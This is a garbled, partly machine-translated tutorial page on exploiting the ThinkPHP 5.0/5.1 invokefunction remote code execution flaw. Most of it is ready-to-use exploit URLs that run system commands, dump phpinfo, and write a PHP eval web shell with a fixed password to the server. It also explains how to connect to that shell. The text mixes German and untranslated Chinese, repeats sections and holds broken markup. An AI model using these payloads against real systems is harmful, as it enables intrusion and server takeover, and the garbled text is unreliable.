Über die Ausnutzung von ThinkPHP-Schwachstellen

藏色散人
Freigeben: 2020-08-31 13:37:53
nach vorne
2987 Leute haben es durchsucht

Das Folgende ist eine Einführung in die Ausnutzung von ThinkPHP-Schwachstellen durch die Tutorial-Kolumne thinkphpFramework. Ich hoffe, dass es für Freunde in Not hilfreich sein wird!

Über die Ausnutzung von ThinkPHP-Schwachstellen

thinkphp_5x_command Ausführungsschwachstelle

Betroffene Versionen umfassen die Versionen 5.0 und 5.1

Docker-Schwachstellenumgebungs-Quellcode:
https://github.com/vulnspy/thinkphp-5.1 . 29<code>https://github.com/vulnspy/thinkphp-5.1.29
本地环境搭建:
thinkphp5.0.15+php5.6n+ apache2.0
http://www.thinkphp.cn/donate/download/id/1125.html

利用system函数远程命令执行

EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

通过phpinfo函数写出phpinfo()信息

EXP:
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1Einrichtung der lokalen Umgebung:

thinkphp5.0.15+php5.6n+ apache2.0

http://www.thinkphp.cn/donate/download/id/1125.html

Systemfunktion für Remote-Befehlsausführung verwenden


EXP
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/ thinkapp/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

phpinfo()-Informationen über die phpinfo-Funktion schreiben


EXP:

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1🎜 🎜Schreiben zum Schälen🎜
http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo ^<?php @eval($_POST["zane"])?^>>shell.php

或者

http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=../test.php&vars[1][]=FUCK<?php @eval($_POST["zane"])?>
Nach dem Login kopieren
🎜Verwenden Sie ein Küchenmesser zum Verbinden🎜`🎜http://127.0.0.1/middleware/thinkphp_5.0.15_full/public/shell.php Das Passwort ist zane🎜🎜http://127.0.0.1/middleware/ thinkphp_5. 0.15_full/test.php Passwort ist zane🎜`🎜

Das obige ist der detaillierte Inhalt vonÜber die Ausnutzung von ThinkPHP-Schwachstellen. Für weitere Informationen folgen Sie bitte anderen verwandten Artikeln auf der PHP chinesischen Website!

Verwandte Etiketten:
Quelle:cnblogs.com
Erklärung dieser Website
Der Inhalt dieses Artikels wird freiwillig von Internetnutzern beigesteuert und das Urheberrecht liegt beim ursprünglichen Autor. Diese Website übernimmt keine entsprechende rechtliche Verantwortung. Wenn Sie Inhalte finden, bei denen der Verdacht eines Plagiats oder einer Rechtsverletzung besteht, wenden Sie sich bitte an admin@php.cn
Beliebte Tutorials
Mehr>
Neueste Downloads
Mehr>
Web-Effekte
Quellcode der Website
Website-Materialien
Frontend-Vorlage